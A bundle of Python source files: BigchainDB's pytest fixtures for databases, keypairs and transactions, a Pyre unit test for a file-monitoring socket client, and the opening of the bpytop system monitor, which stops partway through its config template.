assert graph.graph_def_versions.producer == producer_version
|
conftest.py
|
"""Fixtures and setup / teardown functions
Tasks:
1. setup test database before starting the tests
2. delete test database after running the tests
"""
import os
import copy
import random
from collections import namedtuple
from logging import getLogger
from logging.config import dictConfig
import pytest
from pymongo import MongoClient
from bigchaindb.common import crypto
from bigchaindb.tendermint.lib import Block
TEST_DB_NAME = 'bigchain_test'
USER2_SK, USER2_PK = crypto.generate_key_pair()
# Test user. inputs will be created for this user. Cryptography Keys
USER_PRIVATE_KEY = '8eJ8q9ZQpReWyQT5aFCiwtZ5wDZC4eDnCen88p3tQ6ie'
USER_PUBLIC_KEY = 'JEAkEJqLbbgDRAtMm8YAjGp759Aq2qTn9eaEHUj2XePE'
def pytest_runtest_setup(item):
if isinstance(item, pytest.Function):
backend = item.session.config.getoption('--database-backend')
if (item.get_marker('localmongodb') and backend != 'localmongodb'):
pytest.skip('Skip tendermint specific tests if not using localmongodb')
def pytest_addoption(parser):
from bigchaindb.backend.connection import BACKENDS
backends = ', '.join(BACKENDS.keys())
parser.addoption(
'--database-backend',
action='store',
default=os.environ.get('BIGCHAINDB_DATABASE_BACKEND', 'localmongodb'),
help='Defines the backend to use (available: {})'.format(backends),
)
def pytest_ignore_collect(path, config):
from bigchaindb.backend.connection import BACKENDS
path = str(path)
supported_backends = BACKENDS.keys()
if os.path.isdir(path):
dirname = os.path.split(path)[1]
if dirname in supported_backends and dirname != config.getoption('--database-backend'):
print('Ignoring unrequested backend test dir: ', path)
return True
def pytest_configure(config):
config.addinivalue_line(
'markers',
'bdb(): Mark the test as needing BigchainDB. '
'BigchainDB will be configured such that the database and tables are available for an '
'entire test session. '
'You need to run a backend (e.g. MongoDB) '
'prior to running tests with this marker. You should not need to restart the backend '
'in between test runs since the test infrastructure flushes the backend upon session end.'
)
config.addinivalue_line(
'markers',
'abci(): Mark the test as needing a running ABCI server in place. Use this marker '
'for tests that require a running Tendermint instance. Note that the test infrastructure '
'has no way to reset Tendermint data upon session end - you need to do it manually. '
'Setup performed by this marker includes the steps performed by the bdb marker.'
)
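# Illustrative sketch, not part of the original conftest: how a test module would opt into the
# markers registered above. The test name and body are hypothetical; `b` and `signed_create_tx`
# are fixtures defined further down in this file. Shown as a comment so it does not affect
# test collection.
#
#     @pytest.mark.bdb
#     def test_example(b, signed_create_tx):
#         # the bdb marker guarantees the test database exists and is flushed after the test
#         assert signed_create_tx.id is not None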
@pytest.fixture(autouse=True)
def _bdb_marker(request):
if request.keywords.get('bdb', None):
request.getfixturevalue('_bdb')
@pytest.fixture(autouse=True)
def _restore_config(_configure_bigchaindb):
from bigchaindb import config, config_utils
config_before_test = copy.deepcopy(config)
yield
config_utils.set_config(config_before_test)
@pytest.fixture(scope='session')
def _configure_bigchaindb(request):
import bigchaindb
from bigchaindb import config_utils
test_db_name = TEST_DB_NAME
# Put a suffix like _gw0, _gw1 etc on xdist processes
xdist_suffix = getattr(request.config, 'slaveinput', {}).get('slaveid')
if xdist_suffix:
test_db_name = '{}_{}'.format(TEST_DB_NAME, xdist_suffix)
backend = request.config.getoption('--database-backend')
config = {
'database': bigchaindb._database_map[backend],
'keypair': {
'private': '31Lb1ZGKTyHnmVK3LUMrAUrPNfd4sE2YyBt3UA4A25aA',
'public': '4XYfCbabAWVUCbjTmRTFEu2sc3dFEdkse4r6X498B1s8',
}
}
config['database']['name'] = test_db_name
config = config_utils.env_config(config)
config_utils.set_config(config)
@pytest.fixture(scope='session')
def _setup_database(_configure_bigchaindb):
from bigchaindb import config
from bigchaindb.backend import connect, schema
from bigchaindb.common.exceptions import DatabaseDoesNotExist
print('Initializing test db')
dbname = config['database']['name']
conn = connect()
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
schema.init_database(conn)
print('Finishing init database')
yield
print('Deleting `{}` database'.format(dbname))
conn = connect()
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
print('Finished deleting `{}`'.format(dbname))
@pytest.fixture
def _bdb(_setup_database, _configure_bigchaindb):
from bigchaindb import config
from bigchaindb.backend import connect
from .utils import flush_db
conn = connect()
yield
dbname = config['database']['name']
flush_db(conn, dbname)
# We need this function to avoid loading an existing
# conf file located in the home of the user running
# the tests. If it's too aggressive we can change it
# later.
@pytest.fixture
def ignore_local_config_file(monkeypatch):
def mock_file_config(filename=None):
return {}
monkeypatch.setattr('bigchaindb.config_utils.file_config',
mock_file_config)
@pytest.fixture
def reset_logging_config():
# root_logger_level = getLogger().level
root_logger_level = 'DEBUG'
dictConfig({'version': 1, 'root': {'level': 'NOTSET'}})
yield
getLogger().setLevel(root_logger_level)
@pytest.fixture
def user_sk():
return USER_PRIVATE_KEY
@pytest.fixture
def user_pk():
return USER_PUBLIC_KEY
@pytest.fixture
def user2_sk():
return USER2_SK
@pytest.fixture
def user2_pk():
return USER2_PK
@pytest.fixture
def alice():
from bigchaindb.common.crypto import generate_key_pair
return generate_key_pair()
@pytest.fixture
def alice_privkey(alice):
return alice.private_key
@pytest.fixture
def alice_pubkey(alice):
return alice.public_key
@pytest.fixture
def bob():
from bigchaindb.common.crypto import generate_key_pair
return generate_key_pair()
@pytest.fixture
def bob_privkey(bob):
return bob.private_key
@pytest.fixture
def bob_pubkey(bob):
return bob.public_key
@pytest.fixture
def carol():
from bigchaindb.common.crypto import generate_key_pair
return generate_key_pair()
@pytest.fixture
def carol_privkey(carol):
return carol.private_key
@pytest.fixture
def carol_pubkey(carol):
return carol.public_key
@pytest.fixture
def merlin():
from bigchaindb.common.crypto import generate_key_pair
return generate_key_pair()
@pytest.fixture
def merlin_privkey(merlin):
return merlin.private_key
@pytest.fixture
def merlin_pubkey(merlin):
return merlin.public_key
@pytest.fixture
def b():
from bigchaindb.tendermint import BigchainDB
return BigchainDB()
@pytest.fixture
def tb():
from bigchaindb.tendermint import BigchainDB
return BigchainDB()
@pytest.fixture
def create_tx(b, user_pk):
from bigchaindb.models import Transaction
name = f'I am created by the create_tx fixture. My random identifier is {random.random()}.'
return Transaction.create([b.me], [([user_pk], 1)], asset={'name': name})
@pytest.fixture
def signed_create_tx(b, create_tx):
return create_tx.sign([b.me_private])
@pytest.mark.abci
@pytest.fixture
def posted_create_tx(b, signed_create_tx):
res = b.post_transaction(signed_create_tx, 'broadcast_tx_commit')
assert res.status_code == 200
return signed_create_tx
@pytest.fixture
def signed_transfer_tx(signed_create_tx, user_pk, user_sk):
from bigchaindb.models import Transaction
inputs = signed_create_tx.to_inputs()
tx = Transaction.transfer(inputs, [([user_pk], 1)], asset_id=signed_create_tx.id)
return tx.sign([user_sk])
@pytest.fixture
def double_spend_tx(signed_create_tx, carol_pubkey, user_sk):
from bigchaindb.models import Transaction
inputs = signed_create_tx.to_inputs()
tx = Transaction.transfer(
inputs, [([carol_pubkey], 1)], asset_id=signed_create_tx.id)
return tx.sign([user_sk])
@pytest.fixture
def structurally_valid_vote():
return {
'node_pubkey': 'c' * 44,
'signature': 'd' * 86,
'vote': {
'voting_for_block': 'a' * 64,
'previous_block': 'b' * 64,
'is_block_valid': False,
'invalid_reason': None,
'timestamp': '1111111111'
}
}
def _get_height(b):
maybe_block = b.get_latest_block()
return 0 if maybe_block is None else maybe_block['height']
@pytest.fixture
def inputs(user_pk, b):
from bigchaindb.models import Transaction
# create blocks with transactions for `USER` to spend
for block in range(4):
transactions = [
Transaction.create(
[b.me],
[([user_pk], 1)],
metadata={'msg': random.random()},
).sign([b.me_private]).to_dict()
for _ in range(10)
]
block = Block(app_hash='', height=_get_height(b), transactions=transactions)
b.store_block(block._asdict())
@pytest.fixture
def inputs_shared(user_pk, user2_pk, b):
from bigchaindb.models import Transaction
# create blocks with transactions for `USER` to spend
for block in range(4):
transactions = [
Transaction.create(
[b.me],
[([user_pk, user2_pk], 1)],
metadata={'msg': random.random()},
).sign([b.me_private]).to_dict()
for _ in range(10)
]
block = Block(app_hash='', height=_get_height(b), transactions=transactions)
b.store_block(block._asdict())
@pytest.fixture
def dummy_db(request):
from bigchaindb.backend import connect, schema
from bigchaindb.common.exceptions import (DatabaseDoesNotExist,
DatabaseAlreadyExists)
conn = connect()
dbname = request.fixturename
xdist_suffix = getattr(request.config, 'slaveinput', {}).get('slaveid')
if xdist_suffix:
dbname = '{}_{}'.format(dbname, xdist_suffix)
try:
schema.init_database(conn, dbname)
except DatabaseAlreadyExists:
schema.drop_database(conn, dbname)
schema.init_database(conn, dbname)
yield dbname
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
@pytest.fixture
def not_yet_created_db(request):
from bigchaindb.backend import connect, schema
from bigchaindb.common.exceptions import DatabaseDoesNotExist
conn = connect()
dbname = request.fixturename
xdist_suffix = getattr(request.config, 'slaveinput', {}).get('slaveid')
if xdist_suffix:
dbname = '{}_{}'.format(dbname, xdist_suffix)
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
yield dbname
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
@pytest.fixture
def db_config():
from bigchaindb import config
return config['database']
@pytest.fixture
def db_host(db_config):
return db_config['host']
@pytest.fixture
def db_port(db_config):
return db_config['port']
@pytest.fixture
def db_name(db_config):
return db_config['name']
@pytest.fixture
def db_conn():
from bigchaindb.backend import connect
return connect()
@pytest.fixture
def db_context(db_config, db_host, db_port, db_name, db_conn):
DBContext = namedtuple(
'DBContext', ('config', 'host', 'port', 'name', 'conn'))
return DBContext(
config=db_config,
host=db_host,
port=db_port,
name=db_name,
conn=db_conn,
)
@pytest.fixture
def tendermint_host():
return os.getenv('BIGCHAINDB_TENDERMINT_HOST', 'localhost')
@pytest.fixture
def tendermint_port():
return int(os.getenv('BIGCHAINDB_TENDERMINT_PORT', 46657))
@pytest.fixture
def tendermint_ws_url(tendermint_host, tendermint_port):
return 'ws://{}:{}/websocket'.format(tendermint_host, tendermint_port)
@pytest.fixture
def tendermint_context(tendermint_host, tendermint_port, tendermint_ws_url):
TendermintContext = namedtuple(
'TendermintContext', ('host', 'port', 'ws_url'))
return TendermintContext(
host=tendermint_host,
port=tendermint_port,
ws_url=tendermint_ws_url,
)
@pytest.fixture
def mocked_setup_pub_logger(mocker):
return mocker.patch(
'bigchaindb.log.setup.setup_pub_logger', autospec=True, spec_set=True)
@pytest.fixture
def mocked_setup_sub_logger(mocker):
return mocker.patch(
'bigchaindb.log.setup.setup_sub_logger', autospec=True, spec_set=True)
@pytest.fixture(autouse=True)
def _abci_http(request):
if request.keywords.get('abci', None):
request.getfixturevalue('abci_http')
@pytest.fixture
def abci_http(_setup_database, _configure_bigchaindb, abci_server,
tendermint_host, tendermint_port):
import requests
import time
for i in range(300):
try:
uri = 'http://{}:{}/abci_info'.format(tendermint_host, tendermint_port)
requests.get(uri)
return True
except requests.exceptions.RequestException as e:
pass
time.sleep(1)
return False
@pytest.yield_fixture(scope='session')
def event_loop(request):
import asyncio
loop = asyncio.get_event_loop_policy().new_event_loop()
yield loop
loop.close()
@pytest.mark.bdb
@pytest.fixture(scope='session')
def abci_server():
from abci import ABCIServer
from bigchaindb.tendermint.core import App
from bigchaindb.utils import Process
app = ABCIServer(app=App())
abci_proxy = Process(name='ABCI', target=app.run)
yield abci_proxy.start()
abci_proxy.terminate()
@pytest.fixture
def wsserver_config():
from bigchaindb import config
return config['wsserver']
@pytest.fixture
def wsserver_scheme(wsserver_config):
return wsserver_config['advertised_scheme']
@pytest.fixture
def wsserver_host(wsserver_config):
return wsserver_config['advertised_host']
@pytest.fixture
def wsserver_port(wsserver_config):
return wsserver_config['advertised_port']
@pytest.fixture
def wsserver_base_url(wsserver_scheme, wsserver_host, wsserver_port):
return '{}://{}:{}'.format(wsserver_scheme, wsserver_host, wsserver_port)
@pytest.fixture
def unspent_output_0():
return {
'amount': 1,
'asset_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
'condition_uri': 'ni:///sha-256;RmovleG60-7K0CX60jjfUunV3lBpUOkiQOAnBzghm0w?fpt=ed25519-sha-256&cost=131072',
'fulfillment_message': '{"asset":{"data":{"hash":"06e47bcf9084f7ecfd2a2a2ad275444a"}},"id":"e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d","inputs":[{"fulfillment":"pGSAIIQT0Jm6LDlcSs9coJK4Q4W-SNtsO2EtMtQJ04EUjBMJgUAXKIqeaippbF-IClhhZNNaP6EIZ_OgrVQYU4mH6b-Vc3Tg-k6p-rJOlLGUUo_w8C5QgPHNRYFOqUk2f1q0Cs4G","fulfills":null,"owners_before":["9taLkHkaBXeSF8vrhDGFTAmcZuCEPqjQrKadfYGs4gHv"]}],"metadata":null,"operation":"CREATE","outputs":[{"amount":"1","condition":{"details":{"public_key":"6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz","type":"ed25519-sha-256"},"uri":"ni:///sha-256;RmovleG60-7K0CX60jjfUunV3lBpUOkiQOAnBzghm0w?fpt=ed25519-sha-256&cost=131072"},"public_keys":["6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz"]},{"amount":"2","condition":{"details":{"public_key":"AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT","type":"ed25519-sha-256"},"uri":"ni:///sha-256;-HlYmgwwl-vXwE52IaADhvYxaL1TbjqfJ-LGn5a1PFc?fpt=ed25519-sha-256&cost=131072"},"public_keys":["AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT"]},{"amount":"3","condition":{"details":{"public_key":"HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB","type":"ed25519-sha-256"},"uri":"ni:///sha-256;xfn8pvQkTCPtvR0trpHy2pqkkNTmMBCjWMMOHtk3WO4?fpt=ed25519-sha-256&cost=131072"},"public_keys":["HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB"]}],"version":"1.0"}', # noqa
'output_index': 0,
'transaction_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d'
}
@pytest.fixture
def unspent_output_1():
return {
'amount': 2,
'asset_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
'condition_uri': 'ni:///sha-256;-HlYmgwwl-vXwE52IaADhvYxaL1TbjqfJ-LGn5a1PFc?fpt=ed25519-sha-256&cost=131072',
'fulfillment_message': '{"asset":{"data":{"hash":"06e47bcf9084f7ecfd2a2a2ad275444a"}},"id":"e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d","inputs":[{"fulfillment":"pGSAIIQT0Jm6LDlcSs9coJK4Q4W-SNtsO2EtMtQJ04EUjBMJgUAXKIqeaippbF-IClhhZNNaP6EIZ_OgrVQYU4mH6b-Vc3Tg-k6p-rJOlLGUUo_w8C5QgPHNRYFOqUk2f1q0Cs4G","fulfills":null,"owners_before":["9taLkHkaBXeSF8vrhDGFTAmcZuCEPqjQrKadfYGs4gHv"]}],"metadata":null,"operation":"CREATE","outputs":[{"amount":"1","condition":{"details":{"public_key":"6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz","type":"ed25519-sha-256"},"uri":"ni:///sha-256;RmovleG60-7K0CX60jjfUunV3lBpUOkiQOAnBzghm0w?fpt=ed25519-sha-256&cost=131072"},"public_keys":["6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz"]},{"amount":"2","condition":{"details":{"public_key":"AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT","type":"ed25519-sha-256"},"uri":"ni:///sha-256;-HlYmgwwl-vXwE52IaADhvYxaL1TbjqfJ-LGn5a1PFc?fpt=ed25519-sha-256&cost=131072"},"public_keys":["AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT"]},{"amount":"3","condition":{"details":{"public_key":"HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB","type":"ed25519-sha-256"},"uri":"ni:///sha-256;xfn8pvQkTCPtvR0trpHy2pqkkNTmMBCjWMMOHtk3WO4?fpt=ed25519-sha-256&cost=131072"},"public_keys":["HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB"]}],"version":"1.0"}', # noqa
'output_index': 1,
'transaction_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
}
@pytest.fixture
def unspent_output_2():
return {
'amount': 3,
'asset_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
'condition_uri': 'ni:///sha-256;xfn8pvQkTCPtvR0trpHy2pqkkNTmMBCjWMMOHtk3WO4?fpt=ed25519-sha-256&cost=131072',
'fulfillment_message': '{"asset":{"data":{"hash":"06e47bcf9084f7ecfd2a2a2ad275444a"}},"id":"e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d","inputs":[{"fulfillment":"pGSAIIQT0Jm6LDlcSs9coJK4Q4W-SNtsO2EtMtQJ04EUjBMJgUAXKIqeaippbF-IClhhZNNaP6EIZ_OgrVQYU4mH6b-Vc3Tg-k6p-rJOlLGUUo_w8C5QgPHNRYFOqUk2f1q0Cs4G","fulfills":null,"owners_before":["9taLkHkaBXeSF8vrhDGFTAmcZuCEPqjQrKadfYGs4gHv"]}],"metadata":null,"operation":"CREATE","outputs":[{"amount":"1","condition":{"details":{"public_key":"6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz","type":"ed25519-sha-256"},"uri":"ni:///sha-256;RmovleG60-7K0CX60jjfUunV3lBpUOkiQOAnBzghm0w?fpt=ed25519-sha-256&cost=131072"},"public_keys":["6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz"]},{"amount":"2","condition":{"details":{"public_key":"AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT","type":"ed25519-sha-256"},"uri":"ni:///sha-256;-HlYmgwwl-vXwE52IaADhvYxaL1TbjqfJ-LGn5a1PFc?fpt=ed25519-sha-256&cost=131072"},"public_keys":["AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT"]},{"amount":"3","condition":{"details":{"public_key":"HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB","type":"ed25519-sha-256"},"uri":"ni:///sha-256;xfn8pvQkTCPtvR0trpHy2pqkkNTmMBCjWMMOHtk3WO4?fpt=ed25519-sha-256&cost=131072"},"public_keys":["HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB"]}],"version":"1.0"}', # noqa
'output_index': 2,
'transaction_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
}
@pytest.fixture
def unspent_outputs(unspent_output_0, unspent_output_1, unspent_output_2):
return unspent_output_0, unspent_output_1, unspent_output_2
@pytest.fixture
def mongo_client(db_context):
return MongoClient(host=db_context.host, port=db_context.port)
@pytest.fixture
def utxo_collection(db_context, mongo_client):
return mongo_client[db_context.name].utxos
@pytest.fixture
def dummy_unspent_outputs():
return [
{'transaction_id': 'a', 'output_index': 0},
{'transaction_id': 'a', 'output_index': 1},
{'transaction_id': 'b', 'output_index': 0},
]
@pytest.fixture
def utxoset(dummy_unspent_outputs, utxo_collection):
res = utxo_collection.insert_many(copy.deepcopy(dummy_unspent_outputs))
assert res.acknowledged
assert len(res.inserted_ids) == 3
return dummy_unspent_outputs, utxo_collection
|
project_files_monitor_test.py
|
# Copyright (c) 2019-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import socket
import tempfile
import threading
import unittest
from unittest.mock import MagicMock, patch
from .. import language_server_protocol, project_files_monitor
from ..language_server_protocol import (
LanguageServerProtocolMessage,
read_message,
write_message,
)
from ..project_files_monitor import (
ProjectFilesMonitor,
ProjectFilesMonitorException,
SocketConnection,
)
class ProjectFilesMonitorTest(unittest.TestCase):
@patch.object(language_server_protocol, "perform_handshake")
@patch.object(ProjectFilesMonitor, "_connect_to_socket")
@patch.object(project_files_monitor, "find_root")
def test_subscriptions(self, find_root, _connect_to_socket, perform_handshake):
find_root.return_value = "/ROOT"
arguments = MagicMock()
configuration = MagicMock()
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = "/ROOT"
# no additional extensions
configuration.extensions = []
monitor = ProjectFilesMonitor(arguments, configuration, analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:3],
["allof", ["type", "f"], ["not", "empty"]],
)
self.assertCountEqual(
subscription.subscription["expression"][3],
["anyof", ["suffix", "py"], ["suffix", "pyi"]],
)
# additional extensions
configuration.extensions = ["thrift", "whl"]
monitor = ProjectFilesMonitor(arguments, configuration, analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:3],
["allof", ["type", "f"], ["not", "empty"]],
)
self.assertCountEqual(
subscription.subscription["expression"][3],
[
"anyof",
["suffix", "py"],
["suffix", "pyi"],
["suffix", "thrift"],
["suffix", "whl"],
],
)
# no watchman root -> terminate
find_root.return_value = None
self.assertRaises(
ProjectFilesMonitorException,
ProjectFilesMonitor,
arguments,
configuration,
analysis_directory,
)
def test_bad_socket(self):
with tempfile.TemporaryDirectory() as root:
bad_socket_path = os.path.join(root, "bad.sock")
self.assertRaises(
ProjectFilesMonitorException,
ProjectFilesMonitor._connect_to_socket,
bad_socket_path,
)
@patch.object(ProjectFilesMonitor, "_find_watchman_path")
def test_socket_communication(self, _find_watchman_path):
# Create a "server" thread to complete the handshake
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
errors = []
with tempfile.TemporaryDirectory() as root:
socket_path = os.path.join(root, ".pyre", "server", "json_server.sock")
os.makedirs(os.path.dirname(socket_path))
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
outfile = connection.makefile(mode="wb")
infile = connection.makefile(mode="rb")
write_message(
outfile,
LanguageServerProtocolMessage(
method="handshake/server", parameters={"version": "123"}
),
)
response = read_message(infile)
if not response or response.method != "handshake/client":
errors.append("Client handshake malformed")
return
updated_message = read_message(infile)
if (
not updated_message
or updated_message.method != "updateFiles"
or not updated_message.parameters
or updated_message.parameters.get("files")
!= ["/ANALYSIS/a.py", "/ANALYSIS/subdir/b.py"]
):
errors.append("Update message malformed")
server_thread = threading.Thread(target=server)
server_thread.start()
arguments = MagicMock()
configuration = MagicMock()
configuration.extensions = []
configuration.version_hash = "123"
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = root
analysis_directory.process_updated_files.side_effect = lambda files: [
file.replace("ROOT", "ANALYSIS") for file in files
]
# only create the monitor once the socket is open
with socket_created_lock:
monitor = ProjectFilesMonitor(
arguments, configuration, analysis_directory
)
monitor._handle_response(
{"root": "/ROOT", "files": ["a.py", "subdir/b.py"]}
)
analysis_directory.process_updated_files.assert_called_once_with(
["/ROOT/a.py", "/ROOT/subdir/b.py"]
)
server_thread.join()
self.assertEqual(errors, [])
@patch.object(language_server_protocol, "perform_handshake")
@patch.object(ProjectFilesMonitor, "_watchman_client")
@patch.object(ProjectFilesMonitor, "_connect_to_socket")
@patch.object(ProjectFilesMonitor, "_find_watchman_path")
def test_files_cleaned_up(
self,
_find_watchman_path,
_connect_to_socket,
_watchman_client,
perform_handshake,
):
with tempfile.TemporaryDirectory() as root:
arguments = MagicMock()
configuration = MagicMock()
configuration.extensions = []
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = root
monitor = ProjectFilesMonitor(arguments, configuration, analysis_directory)
monitor._alive = False # never enter watchman loop
monitor._run()
monitor_folder = os.path.join(root, ".pyre", "file_monitor")
self.assertFalse(
os.path.exists(os.path.join(monitor_folder, "file_monitor.lock"))
)
self.assertFalse(
os.path.exists(os.path.join(monitor_folder, "file_monitor.pid"))
)
@patch.object(os.path, "realpath")
def test_socket_connection(self, realpath):
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
with tempfile.TemporaryDirectory() as root:
realpath.side_effect = lambda path: path.replace(
os.path.dirname(path), root # replace parent directories with tempdir
)
# Unix sockets have a limited length of ~100 characters, so the server uses
# symbolic links as a workaround. We need to properly translate these.
socket_link = os.path.join(
"long_name" * 15, ".pyre", "server", "json_server.sock"
)
socket_path = os.path.join(root, "json_server.sock")
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
server_thread = threading.Thread(target=server)
server_thread.start()
with socket_created_lock:
ProjectFilesMonitor._connect_to_socket(socket_link)
server_thread.join()
|
bpytop.py
|
#!/usr/bin/env python3
# pylint: disable=not-callable, no-member
# indent = tab
# tab-size = 4
# Copyright 2020 Aristocratos (jakob@qvantnet.com)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, sys, threading, signal, re, subprocess, logging, logging.handlers, argparse
import urllib.request
from time import time, sleep, strftime, localtime
from datetime import timedelta
from _thread import interrupt_main
from collections import defaultdict
from select import select
from distutils.util import strtobool
from string import Template
from math import ceil, floor
from random import randint
from shutil import which
from typing import List, Set, Dict, Tuple, Optional, Union, Any, Callable, ContextManager, Iterable, Type, NamedTuple
errors: List[str] = []
try: import fcntl, termios, tty, pwd
except Exception as e: errors.append(f'{e}')
try: import psutil # type: ignore
except Exception as e: errors.append(f'{e}')
SELF_START = time()
SYSTEM: str
if "linux" in sys.platform: SYSTEM = "Linux"
elif "bsd" in sys.platform: SYSTEM = "BSD"
elif "darwin" in sys.platform: SYSTEM = "MacOS"
else: SYSTEM = "Other"
if errors:
print("ERROR!")
print("\n".join(errors))
if SYSTEM == "Other":
print("\nUnsupported platform!\n")
else:
print("\nInstall required modules!\n")
raise SystemExit(1)
VERSION: str = "1.0.49"
#? Argument parser ------------------------------------------------------------------------------->
args = argparse.ArgumentParser()
args.add_argument("-f" , "--full" ,action="store_true" ,help ="Start in full mode showing all boxes [default]")
args.add_argument("-p" , "--proc" ,action="store_true" ,help ="Start in minimal mode without memory and net boxes")
args.add_argument("-s" , "--stat" ,action="store_true" ,help ="Start in minimal mode without process box")
args.add_argument("-v" , "--version" ,action="store_true" ,help ="Show version info and exit")
args.add_argument("--debug" ,action="store_true" ,help ="Start with loglevel set to DEBUG overriding value set in config")
stdargs = args.parse_args()
if stdargs.version:
print(f'bpytop version: {VERSION}\n'
f'psutil version: {".".join(str(x) for x in psutil.version_info)}')
raise SystemExit(0)
ARG_MODE: str = ""
if stdargs.full:
ARG_MODE = "full"
elif stdargs.proc:
ARG_MODE = "proc"
elif stdargs.stat:
ARG_MODE = "stat"
DEBUG = stdargs.debug
#? Variables ------------------------------------------------------------------------------------->
BANNER_SRC: List[Tuple[str, str, str]] = [
("#ffa50a", "#0fd7ff", "██████╗ ██████╗ ██╗ ██╗████████╗ ██████╗ ██████╗"),
("#f09800", "#00bfe6", "██╔══██╗██╔══██╗╚██╗ ██╔╝╚══██╔══╝██╔═══██╗██╔══██╗"),
("#db8b00", "#00a6c7", "██████╔╝██████╔╝ ╚████╔╝ ██║ ██║ ██║██████╔╝"),
("#c27b00", "#008ca8", "██╔══██╗██╔═══╝ ╚██╔╝ ██║ ██║ ██║██╔═══╝ "),
("#a86b00", "#006e85", "██████╔╝██║ ██║ ██║ ╚██████╔╝██║"),
("#000000", "#000000", "╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝"),
]
#*?This is the template used to create the config file
DEFAULT_CONF: Template = Template(f'#? Config file for bpytop v. {VERSION}' + '''
#* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme.
#* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. color_theme="+monokai"
color_theme="$color_theme"
#* If the theme set background should be shown, set to False if you want terminal background transparency
theme_background=$theme_background
#* Set bpytop view mode, "full" for everything shown, "proc" for cpu stats and processes, "stat" for cpu, mem, disks and net stats shown.
view_mode=$view_mode
#* Update time in milliseconds, increases automatically if set below internal loops processing time, recommended 2000 ms or above for better sample times for graphs.
update_ms=$update_ms
#* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive",
#* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly.
proc_sorting="$proc_sorting"
#* Reverse sorting order, True or False.
proc_reversed=$proc_reversed
#* Show processes as a tree
proc_tree=$proc_tree
#* Which depth the tree view should auto collapse processes at
tree_depth=$tree_depth
#* Use the cpu graph colors in the process list.
proc_colors=$proc_colors
#* Use a darkening gradient in the process list.
proc_gradient=$proc_gradient
#* If process cpu usage should be of the core it's running on or usage of the total available cpu power.
proc_per_core=$proc_per_core
